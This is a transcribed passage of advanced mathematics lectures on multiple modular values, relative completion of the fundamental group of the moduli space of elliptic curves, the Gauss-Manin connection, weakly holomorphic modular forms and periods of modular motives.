12 you'll get exactly these polynomials, but times some new coefficients. They can be computed to very high order, and the question is: what are they? So let me just summarise what the techniques are.
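My guess at the precise statement behind "this is a cup product" — the spoken formula is garbled here, so treat the signs and the exact meaning of the action with caution: reading off the coefficient of a length-two word in the cocycle relation, using the deconcatenation coproduct, gives

\[
\mathcal{C}^{\mathrm{hol}}_{gh}(w_1w_2)
=\mathcal{C}^{\mathrm{hol}}_{g}(w_1w_2)\big|_{h}
+\mathcal{C}^{\mathrm{hol}}_{g}(w_1)\big|_{h}\ \mathcal{C}^{\mathrm{hol}}_{h}(w_2)
+\mathcal{C}^{\mathrm{hol}}_{h}(w_1w_2),
\]

so the coboundary of the length-two cochain is, up to sign, the cup product of the two length-one cocycles; for w_1 w_2 a word in E_{2m+2} and E_{2n+2}, those are the Eisenstein cocycles written down above.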
So a regularised iterated integral of two Eisenstein series is a very interesting object. What do we get? Well, we get multiple zeta values — some non-trivial multiple zeta values occur — essentially in the same way as before: we get a sort of coboundary term whose coefficient is an MZV, and the depth here can be up to four. The main technique for computing this is the Rankin–Selberg method. It's slightly involved, so I won't say much about it, but using the Rankin–Selberg method — which a priori relates to something different, but can be used to do part of this calculation — what it produces for you is coefficients proportional to the L-function of every cusp form at non-critical values: for all values k greater than or equal to the weight of f. So these are non-critical values of all cusp forms. Again, this is perhaps slightly surprising, because out of Eisenstein series you're getting cusp forms — and when we see the Hodge structure it will be even more surprising, because the Eisenstein series are somehow Tate. But there are good reasons why it produces periods of motives of modular forms. And then, in addition, we get something else, which is kind of curious: another period, which I didn't see in the literature, which is a period of an extension of the trivial motive, if you like, by the motive of a cusp form. This is a simple extension — in a category of Hodge structures or something — by a pure modular motive, and this L-value is essentially the regulator: when you have an extension, the theory of regulators gives you an invariant of the extension class, and Beilinson's conjecture predicts that it should be a special value of the L-function. But such an extension has another period, which is not canonically defined — it's defined up to some rational multiple — and I don't quite know what to call it; at some point I call it c_{f,k}. We get this number as well, showing up as a double Eisenstein integral. So that's basically it: we get multiple zeta values, essentially of two different types, occurring in two places and only two places; we get single zeta values, products of single zeta values, powers of 2 pi i, non-critical L-values, and this sort of companion period that goes with them. Before stopping, I'll mention one other slightly surprising consequence of the cocycle equations — something that I call transference — and then I'll stop. It is that the cocycle relations in length n+1 imply relations in length n. What I mean is: imagine we knew the cocycle in length n, and we want to solve for it in length n+1 in terms of that. The question is whether that is obstructed or not: having done an ansatz at length n, can you then find a solution at length n+1? The answer is yes for cocycles in general, but the answer is no if you fix the value of your cocycle on T, which we know to all orders. So if you ask: having determined the cocycle to length n, can we determine it to length n+1 such that the value on T is what it should be? — then you find it is obstructed, and that obstruction is precisely the Petersson inner product. And it gives something very interesting indeed.
And then you find that the liftability of these equations to the next length actually provides a constraint at the previous order. For length-one iterated integrals it gives a well-known fact, the so-called Kohnen–Zagier "extra relation" satisfied by these period polynomials: the period polynomial P_f of a cusp form is orthogonal to the period polynomial of an Eisenstein series. It's an extra relation. And in length two we get something even more interesting: we find that the iterated integral of two Eisenstein series — or a piece of it — can be related to a piece of the iterated integral of an Eisenstein series and a cusp form, and a piece of that in turn can be related to a period of an iterated integral of two cusp forms. I call this transference because coefficients are getting transferred from one piece of these iterated integrals to an apparently very different piece. As a final comment: I expect that this could generalise — I don't know how to do it — and that we should find the special values of all Rankin–Selberg L-functions at non-critical values. For small values of k you can use the classical Rankin–Selberg method, but I expect these to occur for all values of k as triple iterated integrals. Unfortunately, what's missing is a good analytic technique for computing them: there should be some higher Rankin–Selberg method that enables you to prove that some higher iterated integrals spit out these numbers. And that's very important, because Beilinson's conjecture is not known in this case. I will stop there. Thank you.
|
In the `Esquisse d'un programme', Grothendieck proposed studying the action of the absolute Galois group upon the system of profinite fundamental groups of moduli spaces of curves of genus g with n marked points. Around 1990, Ihara, Drinfeld and Deligne independently initiated the study of the unipotent completion of the fundamental group of the projective line with 3 points. It is now known to be motivic by Deligne-Goncharov and generates the category of mixed Tate motives over the integers. It is closely related to many classical objects such as polylogarithms and multiple zeta values, and has a wide range of applications from number theory to physics. In the first, geometric, half of this lecture series I will explain how to extend this theory to genus one (which generates the theory in all higher genera). The unipotent fundamental groupoid must be replaced with a notion of relative completion, studied by Hain, which defines an extremely rich system of mixed Hodge structures built out of modular forms. It is closely related to Manin's iterated Eichler integrals, the universal mixed elliptic motives of Hain and Matsumoto, and the elliptic polylogarithms of Beilinson and Levin. The question that I wish to confront is whether relative completion stands a chance of generating all mixed modular motives or not. This is equivalent to studying the action of a `motivic' Galois group upon it, and the question of geometrically constructing all generalised Rankin-Selberg extensions. In the second, elementary, half of these lectures, which will be mostly independent from the first, I will explain how the relative completion has a realisation in a new class of non-holomorphic modular forms which correspond in a certain sense to mixed motives. These functions are elementary power series in $q$ and $\overline{q}$ and $\log |q|$ whose coefficients are periods. They are closely related to the theory of modular graph functions in string theory and also intersect with the theory of mock modular forms.
|
10.5446/51001 (DOI)
|
Okay, so today we have to finish at one o'clock on the dot, so what I propose is to start immediately and just keep talking for an hour and a half without a break. So I'll begin with some geometric background. The main space we're going to work on is M_{1,1}, the moduli stack of elliptic curves. There will be two main ways of thinking about it. The first is over the complex numbers: over C we will think of M_{1,1}, or sometimes M_{1,1}^{an}, simply as the orbifold quotient of the upper half plane H by Gamma — I'll be consistent and call the coordinate on H tau — and Gamma throughout this lecture will be SL_2(Z) and nothing else. Okay, so we have the orbifold quotient, and this is very easy to work with: roughly speaking, geometric objects on M_{1,1}^{an}, such as local systems or vector bundles and so on, can be viewed as objects upstairs on H which are Gamma-equivariant. We'll see examples of these. Then we have the universal elliptic curve — really the analytic universal elliptic curve — described again as an orbifold quotient, of C x H by Gamma semi-direct Z^2. Gamma acts on the right on Z^2, and the actions on C x H are as follows: for gamma = (a, b; c, d) in SL_2(Z), gamma(z, tau) = (z/(c tau + d), (a tau + b)/(c tau + d)), and for (m, n) in Z^2, (m, n)(z, tau) = (z + m tau + n, tau). That defines the universal elliptic curve over C. Concretely, a point of M_{1,1} is an isomorphism class of elliptic curves E, and the fibre over that point is the elliptic curve itself. So that's one way to think about M_{1,1}, the very classical one. The second way is much more algebraic. I'll only need to work over Q, but we can do better: we can work over the field — sorry, the ring — K of integers with 12 inverted. To do this it is convenient to work with a slightly different space, which I learned about from DeCaine: M_{1,\vec{1}}. It is rather nice: it is the moduli — not stack, but scheme — of elliptic curves E together with the data, over C at least, of a non-zero tangent vector v in the tangent space of the elliptic curve at the identity. Over C the picture is an elliptic curve with some non-zero tangent vector sticking out of the tangent space at the identity. A more algebraic way to think about it: an elliptic curve with the data of such a tangent vector is equivalent to an elliptic curve with an abelian differential — omega in H^0, a section of the sheaf of holomorphic differentials — such that its pairing with v is 1, for example. Another way to say that: the tangent bundle of an elliptic curve is trivial, so the data of a non-zero tangent vector at the identity dually gives a non-zero holomorphic differential on the whole curve. Okay, so this now has a very algebraic description: such a curve E can be represented by an equation y^2 = 4x^3 - ux - v, with the abelian differential written dx/y. The point is that if you rescale this in the usual manner, you get an isomorphic elliptic curve, but the differential also gets rescaled. More importantly, under the involution y goes to minus y you don't detect anything on the curve itself, but you do detect it on the differential omega, because it changes sign — and that's the reason this is a scheme and not a stack.
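For reference, the analytic description given at the start of this paragraph is:

\[
\mathcal{E}^{\mathrm{an}}=\big(\mathbb{C}\times\mathfrak{H}\big)\big/\big(\Gamma\ltimes\mathbb{Z}^{2}\big),\qquad
\gamma(z,\tau)=\Big(\tfrac{z}{c\tau+d},\ \tfrac{a\tau+b}{c\tau+d}\Big),\qquad
(m,n)(z,\tau)=(z+m\tau+n,\ \tau),
\]

for gamma = (a, b; c, d) in Gamma = SL_2(Z) and (m, n) in Z^2.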
So very explicitly we can write this: M_{1,vec 1} is simply affine space minus a locus, because this elliptic curve is smooth, so the equation has to have non-vanishing discriminant. The space of such equations is parameterized by A^2, with coordinates u and v, minus the locus where the discriminant vanishes. So Delta, here and from now on, will be u^3 - 27 v^2, which is actually one sixteenth of the discriminant of this equation; we don't care about the 16, especially since we are inverting 2. So M_{1,vec 1} is very explicitly this complement in two-dimensional affine space, and it is just Spec of K[u, v, 1/Delta]; here A^2 has coordinates u, v. Okay, so this defines a very explicit scheme, and its affine ring, this thing here O(M_{1,vec 1}), admits a grading, which I think of as a G_m-action, an action of the multiplicative group, and it's the usual one, the one that gives u weight 4 and v weight 6. So (u, v), under the action of a point lambda in G_m(Q) for example, becomes (lambda^{-4} u, lambda^{-6} v). And then with this description (this is a very nice scheme) we can think of M_{1,1} as the stack quotient of M_{1,vec 1} by the action of G_m. That means that objects on M_{1,1} will be viewed as G_m-equivariant objects on this very concrete scheme. And in this language the Deligne-Mumford compactification, which we won't need today, is just the G_m-quotient of A^2 minus the origin. Okay, and in this language the universal elliptic curve is very explicit; I'll just write it up here. The universal elliptic curve over M_{1,vec 1} (it comes with this tangent vector, or this abelian differential) is just explicitly the spectrum of O(M_{1,vec 1}), which is just this ring over here, adjoined x, y, modulo the equation y^2 = 4x^3 - ux - v, well, the ideal generated by that equation. So this is all very concrete. Now I want to describe some local systems: first a local system on M_{1,1}^an, and then secondly an algebraic vector bundle with integrable connection on M_{1,1}. This is all very classical. We are going to give ourselves a family of canonical local systems on M_{1,1}^an, and out of these I'll define the Betti version of relative completion, which will be built out of them. These are, if you like, the basic simple building blocks out of which we are going to construct iterated extensions, which are going to be very complex. So H is what you think it is: it is going to be R^1 pi_* Q, and I forgot to say what pi was: pi is the projection of the universal elliptic curve down to M_{1,1}^an, and Q is the constant sheaf on the elliptic curve. Therefore this describes a rank-2 local system of Q-vector spaces, and it can be described very concretely: the fibre over E is simply the cohomology group H^1 of E with coefficients in Q, which is a two-dimensional Q-vector space. And now, defining in the usual manner, V_n^B (B for Betti, because this is really Betti cohomology we are working with) will be the n-th symmetric power of H, and therefore it is a rank n+1 local system on M_{1,1}^an. We can think of that very concretely, by the principle described earlier: a local system on M_{1,1}^an is the same thing as a Q-vector space of the same dimension plus the data of an action of Gamma. Now let me briefly describe the dual local system to this. This local system has a dual, and its fibres are H_1, or homology, so this can be described very explicitly.
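To summarise the objects so far in symbols, with the grading conventions as just stated:

\[
\Delta = u^3 - 27 v^2, \qquad \mathcal{M}_{1,\vec{1}} = \operatorname{Spec} K[u,v,\Delta^{-1}], \qquad
\lambda\cdot(u,v) = (\lambda^{-4}u,\ \lambda^{-6}v), \qquad \mathcal{M}_{1,1} = \bigl[\mathcal{M}_{1,\vec{1}} / \mathbb{G}_m\bigr],
\]
\[
\mathcal{H} = R^1\pi_*\mathbb{Q}, \qquad \mathcal{V}_n^{B} = \operatorname{Sym}^n \mathcal{H}, \quad \text{a local system of rank } n+1 \text{ on } \mathcal{M}_{1,1}^{\mathrm{an}}.
\]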
So if our elliptic curve (we are working over C here, of course) is C modulo the lattice tau Z + Z, then we have the usual picture of a fundamental domain for this action, with 0 here and tau on the upper half plane up here; the path to 1 we call a, and the path to tau we call b, and then a and b generate the homology group, so a and b are a basis of it. Now, to fit with the modular forms community's notation, I'm going to switch notation and write x = -b and y = -a, and I'm not 100% sure about the signs here; it could be plus, and you can take it plus if you like, but it makes no difference whatsoever, because there are no modular forms of odd weight in this context, so it is impossible to tell. And then this local system can simply be viewed as the vector space V = Qx direct sum Qy (this is the absolutely standard notation in this business), where V has a right action of Gamma: if gamma = (a b; c d), then (x, y) maps to (ax + by, cx + dy), and in this notation the action of gamma on V is denoted by a slash on the right. This is unfortunate, because some people work with a left action; the modular forms community works with a right action, and at some point you can't have your cake and eat it, so I'm going to use right actions from now on. At some point this is going to come back and cause some trouble: you can't get away with having left actions everywhere in this business, and there comes a point where you have to make a decision. This is absolutely standard in the modular forms community, people who do period polynomials and so on, so I adopted it. The problem with right actions is that we write in English from left to right, and there comes a point where it just becomes unworkable, so later on I will probably have to switch to a left action, I'm afraid. I leave you to struggle with these irritating difficulties. Modulo this question of switching between left and right actions, which I don't want to get into, we can think of this local system as follows: the n-th symmetric power of this vector space is simply the space of homogeneous polynomials in two variables of degree n, with the right action of Gamma, and this is the convention that I am going to adopt. So those are the local systems, and now we want some algebraic vector bundles. These are going to be the building blocks for the de Rham relative completion, which is going to be built out of iterated extensions of these building blocks, in the same way that the Betti relative completion will be built out of the Betti ones. So in a consistent way I am going to call it H^dR (you can put a 1 here if you like): it is going to be the relative de Rham H^1 of the universal elliptic curve over M_{1,vec 1}, just as a scheme, plus the Gauss-Manin connection, as defined by Katz-Oda. This can be written down very explicitly as follows. We are now working on M_{1,vec 1}, this very explicit scheme with the defining equation over there. What it is: the underlying vector bundle is actually trivial, a trivial rank-2 coherent sheaf, which is just the affine ring of M_{1,vec 1} together with a generator S and another generator T. I am using blackboard letters because later on S and T will denote the standard elements in SL_2(Z), so this is just to avoid confusion with elements of the group.
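In symbols, with the sign ambiguity in x = -b, y = -a left open exactly as in the lecture:

\[
V = \mathbb{Q}x \oplus \mathbb{Q}y, \qquad (x,y)\big|_{\gamma} = (ax+by,\ cx+dy)\ \ \text{for } \gamma=\begin{pmatrix}a&b\\c&d\end{pmatrix}\in\Gamma,
\]
\[
V_n = \operatorname{Sym}^n V \;\cong\; \{\text{homogeneous polynomials of degree } n \text{ in } x, y\}\ \text{with the right slash action}, \qquad
\mathcal{H}^{\mathrm{dR}} = \mathcal{O}_{\mathcal{M}_{1,\vec{1}}}\,\mathbb{S} \,\oplus\, \mathcal{O}_{\mathcal{M}_{1,\vec{1}}}\,\mathbb{T}.
\]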
And it is going to be G_m-equivariant: there is going to be a G_m-action, or if you prefer, S and T have weights, so lambda acting on S is lambda S and lambda acting on T is lambda^{-1} T. As for what S and T correspond to: T corresponds to the holomorphic differential dx/y, and S corresponds to x dx/y, in the notation over there. You can show that this defines a trivial bundle (these two forms are always linearly independent), and to compute the Gauss-Manin connection you differentiate. These two one-forms are closed on each fibre, on each elliptic curve, but on the family they are not closed, so you differentiate them to get two-forms, and you rewrite the two-forms as one-forms on the base times something that you re-express in terms of this basis of one-forms S and T; you can always do that, and when you do it you get a certain formula, which is very elementary but a bit of a chore to compute. It can be written: the connection is given by d plus (S, T) times a certain matrix of one-forms, with psi and omega on the first row and -(u/12) omega and -psi on the second, times the column (d/dS, d/dT). I should explain what these forms are. I thought it was nice to give this completely explicitly, so it's nice to write it down, and I think the first person to write this down was Katz, in an appendix to a paper in a volume of the Antwerp proceedings in the early 70s, I think. So these forms are very explicit: psi = dDelta/(12 Delta), where Delta is the discriminant, and omega = (3/2)(2u dv - 3v du)/Delta; I remind you that Delta is this thing over there. So this connection is G_m-equivariant, you can check that, and therefore it defines an algebraic vector bundle plus integrable connection on M downstairs, sorry, on M_{1,1}, not M_{1,vec 1}: a priori this is defined on the scheme M_{1,vec 1}, and we view an algebraic vector bundle with integrable connection on the stack quotient as being a G_m-equivariant such object upstairs on M_{1,vec 1}. And I should say that this actually has regular singularities at infinity: it is very easy to compute the residue at the point q = 0 and check that it is nilpotent, and so on and so forth. Then finally we define V_n^dR to be the n-th symmetric power, plus its connection, which is given by exactly that formula. Right, and what I wanted to say is that one of these forms, I think omega, essentially this thing, looks a bit complicated but it really corresponds to dq/q, morally. There is an analytic map from the upper half plane to this, and if you work it out (you should think of u as an Eisenstein series of weight 4 and v as an Eisenstein series of weight 6), then if you compute this you get exactly dq/q coming out. So this looks complicated but it is something very familiar. And then the Riemann-Hilbert correspondence gives an isomorphism between this Betti local system and this algebraic vector bundle: V_n^B tensor O_{M_{1,1}^an} is isomorphic to V_n^dR tensor O. But this means that you are already working upstairs, in some sense. And briefly, as to the element T here: because T corresponds to dx/y, and if you integrate dx/y along a and b you get 1 and tau, you can check that T corresponds, up to some possible power of 2 pi i, to x - tau y, with possibly some sign and some 2 pi i here. Okay, so this is very classical. Before proceeding further, these are the basic building blocks that we are going to use.
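Written out, the connection just described is the following; the placement of the signs and of the factor u/12 is transcribed as dictated and should be checked against Katz's appendix:

\[
\nabla \;=\; d \;+\; \begin{pmatrix}\mathbb{S} & \mathbb{T}\end{pmatrix}
\begin{pmatrix} \psi & \omega \\ -\tfrac{u}{12}\,\omega & -\psi \end{pmatrix}
\begin{pmatrix} \partial/\partial\,\mathbb{S} \\ \partial/\partial\,\mathbb{T} \end{pmatrix},
\qquad
\psi = \frac{d\Delta}{12\,\Delta}, \qquad
\omega = \frac{3}{2}\cdot\frac{2u\,dv - 3v\,du}{\Delta},
\]

and, as claimed above, under u and v proportional to the Eisenstein series of weights 4 and 6 the form omega pulls back to a multiple of dq/q = 2 pi i d tau.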
Sorry? Is this isomorphism where S goes? No, I don't want to compute S; I think it is more complicated, I don't want to say what S is. So, cohomology. By an extension of Grothendieck's theorem from 1964 on algebraic de Rham cohomology, in which he defines algebraic de Rham cohomology (you have to extend this because we are working with vector bundles, which is no problem, and also working over a stack, so you have to say some words, but it is really no big deal, it is just Grothendieck's theorem), there is a canonical isomorphism, called the comparison isomorphism, from the algebraic de Rham cohomology of M_{1,1} with coefficients in this algebraic vector bundle, tensored with C, to (what should I call it? I think of this as Betti cohomology, so you can put a B here if you like) the singular cohomology of M_{1,1}^an with coefficients in the Betti local system, tensored with C. This isomorphism is essentially given by integration, and it produces numbers, it produces periods. So I am now going to explain in more detail what these things are and say some words about these periods, because it is astonishing, but a lot of this did not seem to be anywhere in the literature until very, very recently. Let's first describe this space. Because of the orbifold description of M_{1,1}^an (it is just a simply connected space quotiented by SL_2(Z)), the right-hand side is simply computable in terms of the group cohomology of its fundamental group, so it is H^1(Gamma, V_n), where V_n was this vector space up here, of dimension n+1. So this is just group cohomology, and I gave the definition last time, explicitly in terms of cocycles modulo coboundaries. Then the question is: what is the left-hand side, what is H^1_dR? This should have some description in terms of modular forms. So now let me describe the de Rham cohomology. Let's write M_!^{n+2} (this M is a non-calligraphic, Roman M, to distinguish it from the moduli space), defined to be the space of what are known as weakly holomorphic modular forms of weight n+2 with rational Fourier coefficients. This is a vector space over Q, in fact an infinite-dimensional vector space over Q. So what is it? It is the set of functions f from the upper half plane to C which are holomorphic on H and modular: f((a tau + b)/(c tau + d)) = (c tau + d)^{n+2} f(tau), so they are modular of weight n+2. And furthermore (oops, I forgot to say: here q = e^{2 pi i tau}, of course), because they are translation invariant they have a Fourier expansion, and the point is that they are allowed a Laurent expansion at the cusp; we suppose that they have a Laurent expansion of this form, and "weakly" means you are allowed to have a pole at q = 0. The other condition is that the Fourier coefficients are all rational numbers. So this is a vector space. And yes, what I wanted to say: "weakly" here means that you are allowed a pole at q = 0 but nowhere else; the only pole you are allowed is at the cusp, and you are holomorphic everywhere else on H. So now, the usual, more familiar space of holomorphic modular forms is contained in the weakly holomorphic modular forms, and inside the holomorphic modular forms you have cusp forms.
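In symbols, the space just defined, together with the chain of subspaces:

\[
M_!^{\,n+2} = \Bigl\{ f:\mathbb{H}\to\mathbb{C} \text{ holomorphic} \ \Big|\ f\!\left(\tfrac{a\tau+b}{c\tau+d}\right) = (c\tau+d)^{\,n+2} f(\tau)\ \forall\,\gamma\in\Gamma,\ \
f = \!\!\sum_{m\geq -N}\! a_m q^m,\ a_m\in\mathbb{Q} \Bigr\},\qquad q = e^{2\pi i \tau},
\]
\[
S^{\,n+2} \;\subset\; M^{\,n+2} \;\subset\; M_!^{\,n+2},
\]

where M^{n+2} (holomorphic forms) corresponds to having no pole, and S^{n+2} (cusp forms) additionally has a_0 = 0.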
So these, the holomorphic modular forms, are the subspace of functions which are holomorphic at the cusp; in this definition it means that N = 0, so there is no pole at q = 0. And a cusp form is holomorphic at the cusp and, in addition, the constant term a_0 of the Fourier expansion vanishes. Now, on this space of weakly holomorphic modular forms there is an operator q d/dq, which is often called the Bol operator. You can certainly take such a Laurent expansion and differentiate it term by term, but in general that will not be a modular form: it destroys this property, it does not preserve modularity. But what Bol showed, I think in the 1950s, is that if you apply this operator many times, if you take the (n+1)-st power of this operator, then it does in fact preserve modularity, provided you restrict to the space of the correct modular weight. So if you look at modular forms of weight -n, then the (n+1)-st power, by some coincidence or accident, some miracle, gives you modular forms of weight n+2. That is the content of Bol's theorem. And I have to mention here that of course there are no holomorphic modular forms of negative weight, but there are many weakly holomorphic modular forms of negative weight, in fact an infinite-dimensional vector space of them. Okay, so the theorem then is that you can describe this cohomology explicitly in terms of these weakly holomorphic modular forms. What are the properties? Well, I am not sure I have anything particularly interesting to say, beyond the properties that follow from the fact that it is this explicit differential operator. The only thing I can add is that the image lands in the space of cusp forms: there is a notion S_!, the subspace where a_0 vanishes. That is a useful property that I won't need, but it is the only thing I can really add. There is another way you can factorize this; the best way to see it is to factorize it in terms of holomorphic and anti-holomorphic differential operators, each of which does preserve modularity, and that is a better way to think about it. Okay, so the theorem is that there exists a canonical isomorphism: weakly holomorphic modular forms modulo the image of the Bol operator (so you want to think of (n+1)-fold derivatives of forms of weight -n as trivial in some sense) is isomorphic to the algebraic de Rham cohomology. The map assigns to f the class of f omega T^n, which is a section of the right kind; you have to check that it is annihilated by nabla, and that the image of the Bol operator maps to zero, so that it defines an isomorphism on cohomology. A remark is that this space M_! has a very natural description: you can think of it as the piece of weight n+2 in Q tensor O(M_{1,vec 1}), which is nothing other than the piece of graded weight n+2 in the ring Q[u, v, 1/Delta]. Here u has weight 4, v has weight 6 and Delta has weight 12, and so every weakly holomorphic modular form is a polynomial in the Eisenstein series G_4 and G_6 divided by some power of the Ramanujan cusp form. That's what it's saying.
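The two statements just made, in symbols; the class on the right uses the one-form omega and the section T from the connection above, exactly as dictated:

\[
D = q\,\frac{d}{dq}, \qquad D^{\,n+1}:\ M_!^{\,-n} \longrightarrow M_!^{\,n+2} \quad\text{(Bol)},
\]
\[
M_!^{\,n+2}\big/ D^{\,n+1} M_!^{\,-n} \;\xrightarrow{\ \sim\ }\; H^1_{\mathrm{dR}}\bigl(\mathcal{M}_{1,1},\ \mathcal{V}_n^{\mathrm{dR}}\bigr), \qquad f \longmapsto \bigl[\, f\,\omega\,\mathbb{T}^{\,n}\,\bigr].
\]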
So this theorem: I am a bit embarrassed to say, but it seemed, from reading the modern literature, that it was not known in this form, and so I suggested to my collaborator Richard Hain that we write it up; and then later on it was pointed out to us that it kind of was known. So the history is sort of complicated. It was proved most recently by Kazalicki and Scholl; I think the first explicit proof in the literature is theirs, in 2016, somewhat surprisingly. A lot of this is implicit already in Scholl's work in the 90s, but there is also a similar statement in the p-adic setting, where you have to remove the singular locus (it is a slightly different statement), due to Coleman in '96, I think; this was then redone very recently by Candelori in 2014, and the study of this left-hand space, which is where I learned about it, was in a paper by Guerzhoy in 2008. Guerzhoy showed in fact that this quotient splits, in some sense: you can always represent elements of this quotient simply by weakly holomorphic modular forms whose pole in q is bounded by the dimension of the space of cusp forms. So this has quite an explicit description; I'll come to that in a minute. These proofs are essentially the same, and they use the fact that you work on a scheme: you work on a higher-level modular curve and then you deduce this from that. But my proof with Richard Hain is a direct proof on the stack, straight off. So Hain and I did this in 2017, and I tried to give a fair account of the history, which is somewhat complicated. So this space here has a Hodge filtration. Under this isomorphism, the subspace of holomorphic modular forms (this would be a Roman M) corresponds exactly to F^{n+1}. So here we have a de Rham thing and a Betti thing that are compared via some canonical comparison isomorphism. In fact, you can go much further and show that either the left-hand side or the right-hand side is the de Rham realisation of an actual pure motive, and this was done by Scholl in the mid-80s; and much later there is another construction of this due to Consani and Faber on the moduli space of elliptic curves. Okay, so this actually comes from a motive, and let me describe it quickly, depending on how much time I have. So, as probably we all know (let me just write the de Rham realisation), it decomposes into an Eisenstein part and a cuspidal part, and this decomposition is actually motivic: it is actually true on the level of the motives that it splits. Then let me tell you what each piece looks like. What are the Hodge numbers? The Hodge types of the cuspidal part are (n+1, 0) and (0, n+1), and the Eisenstein part has Hodge numbers (n+1, n+1). In fact, as a motive the Eisenstein part is going to be one-dimensional, or at most one-dimensional, and as a Hodge structure it is going to be Q(-n-1). I am not going to say much about Hodge structures today, but I will next time. So what is this? The Eisenstein part is generated by Eisenstein series: G_{n+2} of weight n+2 for all n greater than or equal to 2, and it vanishes otherwise. And I remind you that the Eisenstein series G_k is a modular form of weight k whose constant Fourier coefficient is a Bernoulli number, plus the sum over m of sigma_{k-1}(m) q^m.
So this is the normalization that we are going to take for the Eisenstein series, and of course it has rational Fourier coefficients, in fact integral Fourier coefficients from here onwards, as indeed you expect. So that is the description of the Eisenstein part; it is very concrete. The cuspidal part is a little more tricky, but if we extend scalars, if we tensor this (which is a Q-vector space) with Q-bar (you can get away with a lot less, but let's tensor with Q-bar for simplicity), then this thing admits an action of Hecke operators (well, it admits an action of Hecke operators anyway), and over Q-bar it will decompose into eigenspaces. So over Q-bar it decomposes, as a motive, into a direct sum of pure motives V_lambda; I realize I am overusing the letter V, but let me not make a dangerous change of notation at this stage. This will be the sum over cuspidal Hecke eigenspaces, and each V_lambda has rank two (it is a two-dimensional Q-bar vector space) with those Hodge numbers, and it is actually a pure motive over Q-bar. Okay, good. So now let's just do an example in weight 12, to get a feel for it. Weight 12 is the first interesting case, so n = 10. Then this space of weakly holomorphic modular forms, modulo the quotient, can be represented by the following three modular forms. We have G_12, the Eisenstein series, which is a holomorphic modular form in M^12; then we have the Ramanujan cusp form Delta, which is q - 24 q^2 + 252 q^3 - ..., a cusp form of weight 12; and then something else, because the motive of the cusp form has rank two, so there should be another de Rham class. It is given by something called Delta', and as Guerzhoy shows, you can represent classes in this quotient uniquely if you impose the condition that the pole has order at most the dimension of the space of cusp forms. Here the space of cusp forms is one-dimensional, so we can choose a representative that begins q^{-1} plus something, and here is what it looks like: q^{-1} + ..., and this is in M_!^12. You can write it down explicitly as some weight-24 modular form divided by Delta, and in fact that determines it uniquely. And so the de Rham realisation of the motive associated to Delta is the two-dimensional vector space spanned by Delta and Delta': we have got a holomorphic modular form and a weakly holomorphic modular form.
Yeah, they do; that's the point, and this is what I learned from Guerzhoy's paper. The Hecke operators preserve this subspace (that is a property of the Bol operator), and therefore the Hecke operators act on this quotient. But it is a subtle thing, because if you take a weakly holomorphic modular form like Delta', what the Hecke operators do is increase the order of the pole. So if you apply a Hecke operator to Delta' you get something, and then you have to subtract off something in this guy, some differential, and then you get back a multiple of Delta', and it has the same Hecke eigenvalues as Delta. So that is a subtlety: Delta satisfies a Hecke eigenvalue equation, it is a genuine eigenfunction, but Delta' is an eigenfunction with an inhomogeneous term. You get something like T_p Delta' = lambda_p Delta' + D^{11}(psi_p), whatever it is, where psi_p is going to depend on the prime. That is what it means to be a Hecke eigenfunction in this setting. Yes, it is very interesting, and I don't know that people have really studied these very much; there are some papers studying the arithmetic properties of these coefficients, but they are not completely mainstream. I think they are extremely interesting and clearly absolutely central to this story; they rightfully deserve a central place in the theory. Okay, so now periods, which was my motivation, with Hain, for proving this theorem: we wanted to know that this was the correct Q-structure in which to define the periods of the motives of modular forms. Indeed, the corollary of Grothendieck's result over on that board is that this quotient here is canonically isomorphic, by the comparison isomorphism, to H^1(Gamma, V_n) tensor C, and the map, if you work it all out, sends f to the cocycle which to an element gamma of SL_2(Z) assigns the integral from gamma^{-1} tau_0 to tau_0 of (2 pi i)^{n+1} f(tau) (X - tau Y)^n d tau. And this holds for any choice: you pick any point tau_0 on the upper half plane and integrate along the geodesic (there is a unique geodesic between gamma^{-1} tau_0 and tau_0), and this gives you some polynomial in X and Y; this defines a cocycle, and if you modify your choice of tau_0, that modifies it by a coboundary, so the cohomology class is well defined, and it is the canonical comparison isomorphism. I could talk for a long time about this, but let me just say a couple of brief words. This is not the Eichler-Shimura isomorphism; the Eichler-Shimura isomorphism is a weaker statement than this. So this is stronger than the classical Eichler-Shimura theorem, which states (well, which we often write in the following way) the same thing: it is the same map, but applied only to holomorphic modular forms and to complex conjugates of cusp forms, and it is true that this gives an isomorphism. I am being a little bit sloppy: you have to take invariant and anti-invariant parts.
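As a display, the comparison map just described, for any base point tau_0 in the upper half plane (changing tau_0 changes the cocycle by a coboundary):

\[
M_!^{\,n+2}\big/ D^{\,n+1}M_!^{\,-n}\;\otimes\;\mathbb{C} \;\xrightarrow{\ \sim\ }\; H^1(\Gamma, V_n)\otimes\mathbb{C},
\qquad
f \;\longmapsto\; \Bigl(\ \gamma \;\mapsto\; \int_{\gamma^{-1}\tau_0}^{\tau_0} (2\pi i)^{\,n+1}\, f(\tau)\,(X-\tau Y)^{\,n}\, d\tau \ \Bigr).
\]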
But let me just give the punch line. The point is that if you do this with the Eichler-Shimura isomorphism, it will only produce for you two periods for each motive of a modular form, for each V_lambda, whereas this corollary actually generates all the periods, all four periods: the periods and the quasi-periods. The example to think of is an elliptic curve: you have the periods, where you integrate dx/y over the A and B cycles; these are the periods, and there are two of them, and the Eichler-Shimura theorem gives you exactly the two periods in the modular analogue. But, as we know for an elliptic curve, to get the full matrix of periods you have to consider differential forms of the second kind, and these give what are called quasi-periods. So this is the period matrix, if you like, in a certain basis: the Eichler-Shimura theorem is only giving you this column, whereas the full comparison isomorphism is a full period matrix, and it gives the other column as well. And that was the reason for doing this work, to sort this out. In fact it seems to me that even for the case of this motive here, the Ramanujan cusp form, the quasi-periods were not known, or had not been computed; at least I could not find them in the literature, and they are very useful: they turn up in physics and in all sorts of other places. Right, so that is all quite classical in principle. Now I want to talk about relative completion. So far everything is pure motives, it is all abelian; we are talking about cohomology, not about fundamental groups, and now we are going to make it all non-abelian. The first technical point that we need is the notion of a tangential base point, and this notion is due to Deligne. You map to the H^1, and then what's the next step; where do you expect the fourth period to come from? Well, you want to know how to get the four periods from this: you apply this to Delta and Delta', which gives you something, and then H^1(Gamma, V_n) has an action of epsilon, which is the real Frobenius, epsilon being something like (x, y) maps to (x, -y) for example, and then you have H^1(Gamma, V_n)^{+/-}. So you take the plus part; in this weight, weight 12, you have an Eisenstein class and you have a cusp class with a plus and a minus part, and the image is, you can find a representative cocycle which is the well-known one: it is X^10 - Y^10, plus 36 over 691 times, I don't know, I'm making this up, something, whatever. You have a 2-by-2 matrix here. But also, for the Eisenstein case, you actually get a canonical 